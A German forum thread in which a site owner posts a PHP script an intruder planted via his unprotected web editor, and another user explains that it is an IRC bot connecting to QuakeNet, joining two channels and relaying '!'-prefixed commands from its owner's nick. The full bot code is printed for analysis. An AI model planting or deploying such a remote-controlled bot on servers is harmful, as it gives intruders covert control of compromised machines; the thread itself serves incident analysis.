Hallo

Ich habe so eben eine eingeschlichene Datei auf meinem Server gefunden, und wäre verbunden, sofern mich jemand aufklärt, was der Code vor hat bzw, wozu er genau bestimmt ist!

PHP-Code:

<? 
$server = "irc.de.quakenet.org"; // <---da kommt der server rein.// 
$port = "6667"; //<--port.// 

$nick3 = "hullaui"; //<----da kommt der ident rein.// 
$realna = "ficgehr"; //<---da der realname. // 
$owner = "MINImi"; //<---da kommt der nick des botbesitzers rein.// 
if (!$nick2) 
{ 
$nick2 = "***"; 
} 
$connect = fsockopen($server, $port); 
echo "<title>".$nick2."</title>"; 
fputs($connect, "USER $nick3 0 0 :$realna\n\r"); 
fputs($connect, "NICK $nick2\n\r"); 
echo "Running "; 
while(!feof($connect)) 
{ 
$new = fgets($connect, 1024); 
$part = explode(" ",$new); 
if($part[0] == "PING") 
{ 
$ping = explode(":", $new); 
$reply = $ping[1]; 
fputs($connect, "PONG $reply\n\r"); 
if (!$firstrun) {  
fputs($connect, "JOIN #minimi,#polite \n\r"); 
$firstrun = "1"; 
} 
} 
if(substr($part[2],0,1) != "#" && $nick == $owner) { 
if(substr($part[3],0,2) == ":!") 
{ 
$part_count = count($part)-1; 
$i = "3"; 
$part[3] = substr($part[3],2); 
while($i <= $part_count) 
{ 
$cmd.=$part[$i]." "; 
$i++; 
} 
fputs($connect, "$cmd\n\r"); 
unset($cmd); 
} 
} 
elseif(substr($part[2],0,1) == "#") 
{ 
$nick = explode("!",$part[0]); 
$nick = substr($nick[0],1); 
if(substr($part[3],0,5) == ":!hop" && $nick == $owner) 
{ 
fputs($connect, "part $part[4] rejoining. \n\r"); 
fputs($connect, "join $part[4] \n\r"); 
} 
elseif(substr($part[3],0,2) == ":!" && $nick == $owner) 
{ 
$part_count = count($part)-1; 
$i = "3"; 
$part[3] = substr($part[3],2); 
while($i <= $part_count) 
{ 
$cmd.=$part[$i]." "; 
$i++; 
} 
fputs($connect, "$cmd\n\r"); 
unset($cmd); 
} 
} 
} 
?>

Noch eine Sache wäre da, er liegt in einer HTML Datei, und konnte daher nicht ausgeführt werden, da sich diese nicht in der zeichenfolge php ubenennen kann. Dennoch würde ich gerne wissen, was der (Hacker) vorh hatte.

Gruss!

PS Ich weis schon das es sich hier um eine IRC Verbindung handelt, aber was genau

die lag da so drauf, mit den komentaren?

Das Script stellt einen IRC-Bot dar. Es baut eine Verbindung in das Quakenet auf, betritt die Channels #minimi und #polite und wartet dort auf Anweisungen von jemandem mit dem Nick MINImi. Bei "!hop" macht der Bot einen Cycle im jeweiligen Channel, alle anderen Nachrichten, die mit "!" beginnen, werden unter Wegnahme des "!" vom Bot an den Server weitergeschickt.

Das ganze ist allerdings ziemlich laienhaft programmiert, wenn ich anmerken darf...

Herzlichen Dank @ Matthias Reitinger

- Ja der Script lag so auf meinem Server. Allerdings in einer HTML Datei. Der Typ hat sich halt eben gedacht, er editiert die HTML Datei mit meinem online Editor, und schreibt einen Code rein. Dies ist im auch gelungen, habe da auch kein Schutzmechanismus! Aber dann muss er noch aus der HTML eine PHP machem

Anbei Frage:
PHP Codes können nicht innerhalb einer HTML Datei abgerufen werden, soweit man die Datei nicht in eine PHP Datei includet oder?

Ja jedenfalls hat er versucht mittels eines Editors (Der von mir im Web liegt) Das Dokument in eine PHP umzubenenen, hat aber nicht geklappt, da ich 1. keinen Punkt 2. eregi ("php") im namen suche und dritens die letzte endun slebst hinterherlege. Also er kann zwar ein Namen eingeben wie mach aus index index2 aber nicht mach aus inde.html index.php

Naja Danke nochmals!

PS Eine Frage noch, wo wird der Code ausgeführt? Ich meine die Zeilen die er eingibt. (Sehe kein eval() oder so) Gruss!

PPS Ach du lieber Gott, er hat das Ding ausgeführt und ich weis jetzt dank dir wie!

100000000000000000000000 Dank nochmal!